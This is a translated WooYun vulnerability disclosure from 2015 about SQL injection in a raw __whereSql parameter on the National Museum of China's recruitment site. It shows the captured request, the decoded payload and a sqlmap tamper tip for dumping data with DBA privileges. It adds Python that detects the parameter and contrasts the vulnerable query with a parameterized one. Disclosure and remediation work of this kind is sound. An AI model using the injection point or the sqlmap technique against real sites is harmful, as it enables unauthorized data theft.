WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-03-30: Details sent to the vendor; awaiting the vendor's handling.
2015-04-03: Vendor has confirmed; details disclosed to the vendor only.
2015-04-13: Details disclosed to core white hats and experts in related fields.
2015-04-23: Details disclosed to regular white hats.
2015-05-03: Details disclosed to intern white hats.
2015-05-18: Details disclosed to the public.
Vulnerability type: Injection
Recruitment site of the National Museum of China: http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/commonPage.jsp?innercode=007. The injection point is the search field for recruitment specialty. Searching for 1111 and capturing the request with Burp gives:
POST /dap/dframe/ext.AJAX.f?__ajax=true HTTP/1.1
Host: guobozhaopin.chnmuseum.cn
Proxy-Connection: keep-alive
Content-Length: 768
Pragma: no-cache
Origin: http://guobozhaopin.chnmuseum.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/vacancy_list.jsp?channel=3&innercode=001
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=CB9F01D4F3C5FCA5C703D5A1F061BA40

_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=%3Crpc%20id%3D%22dsVacancy%22%20type%3D%22wrapper%22%20objectclazz%3D%22undefined%22%20pi%3D%221%22%20ps%3D%2230%22%20pc%3D%221%22%20prc%3D%220%22%20fs%3D%22pk_vacancy%2Cpk_corp%2Cpk_dept%2Cunitname%2Cdeptname%2Cedureq%2Cedureq_showname%2Cgenderreq%2Cgenderreq_showname%2Crequirecount%2Cworkplace%2Cishot%2Creleasedate%2Cmajorreq%2Cmajornamereq%2Cjob_name%2Cchannel%2Cpk_choose%2Cinnercode%2Cmajorreq_showname%2Cid%22%3E%3Cps%3E%3Cp%20name%3D%22channel%22%3E3%3C/p%3E%3Cp%20name%3D%22__whereSql%22%3Edt_vacancy.job_name%2520like%2520%2527%25251111%2525%2527%3C/p%3E%3C/ps%3E%3Cvps%3E%3Cp%20name%3D%22isUseRauthCode%22%3E1%3C/p%3E%3C/vps%3E%3C/rpc%3E&1427426798657
URL-decoding the POST parameters gives:
_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=<rpc id="dsVacancy" type="wrapper" objectclazz="undefined" pi="1" ps="30" pc="1" prc="0" fs="pk_vacancy,pk_corp,pk_dept,unitname,deptname,edureq,edureq_showname,genderreq,genderreq_showname,requirecount,workplace,ishot,releasedate,majorreq,majornamereq,job_name,channel,pk_choose,innercode,majorreq_showname,id"><ps><p name="channel">3</p><p name="__whereSql">dt_vacancy.job_name like '%1111%'</p></ps><vps><p name="isUseRauthCode">1</p></vps></rpc>&1427426798657
It can be seen that the dt_vacancy.job_name condition, passed by the client inside the __whereSql parameter, is not filtered strictly, which leads to injection. Note also that the query uses like '%%', so when dumping data with sqlmap you must add --tamper equaltolike.py.
DBA privileges.
Proof of vulnerability: As above.
Fix suggestion: Filter the input.
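The two points above, the client-supplied __whereSql fragment and the fix, as an added illustration that is not code from the report or from the vendor's framework: a constructed sample of the decoded _xml value, a check that pulls the __whereSql text out of it (the signal a gateway or log review can key on), the splice-in pattern the report implies beside a parameterized LIKE query in which the server owns the predicate. The SQLite table, its schema and all function names are assumptions.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed sample of the decoded "_xml" value from the report: the user's
# search term "1111" arrives already wrapped in a SQL predicate.
SAMPLE_XML = (
    '<rpc id="dsVacancy" type="wrapper"><ps><p name="channel">3</p>'
    "<p name=\"__whereSql\">dt_vacancy.job_name like '%1111%'</p></ps></rpc>"
)


def extract_where_sql(xml_text):
    """Return the client-supplied __whereSql fragment, or None if absent.
    Flag any request carrying it: the client is handing over a raw WHERE clause."""
    root = ET.fromstring(xml_text)
    for p in root.iter("p"):
        if p.get("name") == "__whereSql":
            return p.text or ""
    return None


def make_db():
    # Constructed in-memory table standing in for dt_vacancy (assumed schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dt_vacancy (job_name TEXT)")
    conn.executemany(
        "INSERT INTO dt_vacancy VALUES (?)",
        [("Curator 1111",), ("Archivist",), ("Guide 50%_time",)],
    )
    return conn


def vulnerable_vacancy_query(conn, where_sql):
    # The pattern the report implies: the fragment is spliced in verbatim, so
    # whoever controls __whereSql controls the predicate.
    sql = "SELECT job_name FROM dt_vacancy WHERE " + where_sql
    return [row[0] for row in conn.execute(sql)]


def hardened_vacancy_query(conn, search_term):
    # The server owns the predicate; the client supplies only a term, bound as
    # a parameter. LIKE metacharacters are escaped so '%' and '_' in the term
    # match literally rather than acting as wildcards.
    escaped = (
        search_term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    )
    sql = "SELECT job_name FROM dt_vacancy WHERE job_name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]
```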
Severity: Medium
Vulnerability rank: 8
Confirmed: 2015-04-03 13:02
CNVD has confirmed and reproduced the described situation and has notified the website's administering unit through the contact details published on the website (or a previously established handling channel).
None yet.